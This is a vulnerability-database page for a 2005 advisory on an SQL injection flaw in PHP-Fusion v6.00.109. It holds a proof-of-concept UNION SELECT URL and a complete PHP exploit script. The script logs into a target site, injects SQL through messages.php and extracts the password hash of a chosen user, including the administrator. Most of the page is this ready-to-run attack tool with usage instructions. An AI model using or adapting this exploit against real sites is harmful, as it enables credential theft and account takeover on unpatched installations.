PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure

2005.09.29
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure site: http://www.php-fusion.co.uk - if magic_quotes off -> SQL Injection, poc: http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/* now hash is showed in "To:" field when you post a private message this is the tool: <?php # 19.17 28/09/2005 # # # # -- PhpF6_00_109xpl.php # # # # PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure # # # # by rgod # # site: http://rgod.altervista.org # # # # mphhh, private messages again...tze,tze # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # go! # # # # Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy, # # but does not allow the enemy's will to be imposed on him" # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title> <meta http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color: #000000;} .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head><body> <p class="Stile6"> Php-Fusion v6. 00.109 SQL Injection / admin|user credentials disclosure </p><p class="Stile6"> a script by rgod at <a href="http://rgod.altervista.org" target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=value &port=value&proxy=value&user=value&pass=value&username=value"> <p> <input type="text" name="host"><span class="Stile5"> hostname ( ex: www.sitename.com ) </span></p> <p> <input type="text" name="path"><span class="Stile5"> path (ex: /phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value)</span></p><p> <input type="text" name="user"> <span class="Stile5">your username </span> </p> <p> <input type="text" name="pass"> <span class="Stile5">your password ( to get a valid session cookie) </span></p><p><input type="text" name="username"> <span class="Stile5">user whom you want the password </span></p><p><input type="text" name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy </span> </p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td> </tr> </table></body></html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td> </td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td> </td>"; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; } echo "</tr></table>"; } $proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)'; function sendpacket() { global $proxy, $host, $port, $html, $packet; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,2048); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>'')) { if ($port=='') {$port=80;} #STEP 1 -> login, to retrieve a session cookie... $data="user_name=".urlencode(trim($user))."&user_pass=".urlencode(trim($ pass))."&login=Login"; if ($proxy=='') {$packet="POST ".$path."news.php HTTP/1.1rn";} else {$packet="POST http://".$host.$path."news.php HTTP/1.1rn";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*rn"; $packet.="Referer: http://".$host.$path."/news.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="Accept-Encoding: gzip, deflatern"; $packet.="User-Agent: Googlebot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Connection: Keep-Alivern"; $packet.="Cache-Control: no-cachern"; $packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cfrnrn"; $packet.=$data; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]; echo '<br>Your cookie: '.htmlentities($cookie); # STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database $username=str_replace("'","",$username); $sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*"; if ($proxy=='') {$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1rn";} else {$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1rn";} $packet.="User-Agent: GameBoy, Powered by Nintendorn"; $packet.="Host: ".$host."rn"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1rn"; $packet.="Accept-Language: enrn"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1rn"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0rn"; $packet.="Cookie: ".$cookie."rn"; $packet.="Cookie2: $Version=1rn"; $packet.="Connection: Keep-Alive, TErn"; $packet.="TE: deflate, gzip, chunked, identity, trailersrnrn"; show($packet); sendpacket($packet); if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; } $temp=explode("'Click to view the senders profile'>",$html); $temp2=explode("</a>",$temp[1]); $hash=$temp2[0]; echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash; } else { echo '<br> Fill requested fields, optionally specify a proxy...';} ?> rgod site: http://rgod.altervista.org mail: retrogod (at) aliceposta (dot) it [email concealed] original advisory: http://rgod.altervista.org/phpfusion600109.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top